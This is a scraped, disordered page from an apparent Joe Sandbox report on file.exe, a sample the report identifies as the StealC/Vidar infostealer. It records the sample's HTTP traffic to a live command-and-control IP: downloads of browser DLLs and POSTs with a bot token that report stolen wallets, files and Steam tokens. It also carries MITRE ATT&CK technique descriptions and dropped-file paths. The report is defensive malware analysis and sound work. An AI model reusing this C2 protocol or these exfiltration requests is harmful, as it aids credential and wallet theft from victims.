48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 2d 2d 0d 0a Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file"------BKKJKFBKKECFHJKEBKEH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIIEHJDBKJKECBFHDGHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 2d 2d 0d 0a Data Ascii: ------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="message"wallets------CBFIIEHJDBKJKECBFHDG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJKJDBFIIDHJKEHJEHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 2d 2d 0d 0a Data Ascii: ------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file"------CBKJKJDBFIIDHJKEHJEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"files------EHIIIJDAAAAAAKECBFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 2d 2d 0d 0a Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGIDGCGIEGDGDGDGHJK--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKKJKFBKKECFHJKEBKEH

C:\ProgramData\CBKJKJDB

C:\ProgramData\DBFHDHJKKJDHJJJJKEGHIDGDHD

C:\ProgramData\DGHCBAAEHCFIDGDHJEHC

C:\ProgramData\FBFCAKKK

C:\ProgramData\GDHIDHIEGIIIECAKEBFB

C:\ProgramData\HDGCAAFBFBKFIDGDHJDBKECFBA

C:\ProgramData\JJECGCBGDBKJJKEBFBFHJEBGDG

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00269860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 002545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0025BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C5B35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00264910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00269C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00257710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00260250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00255100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre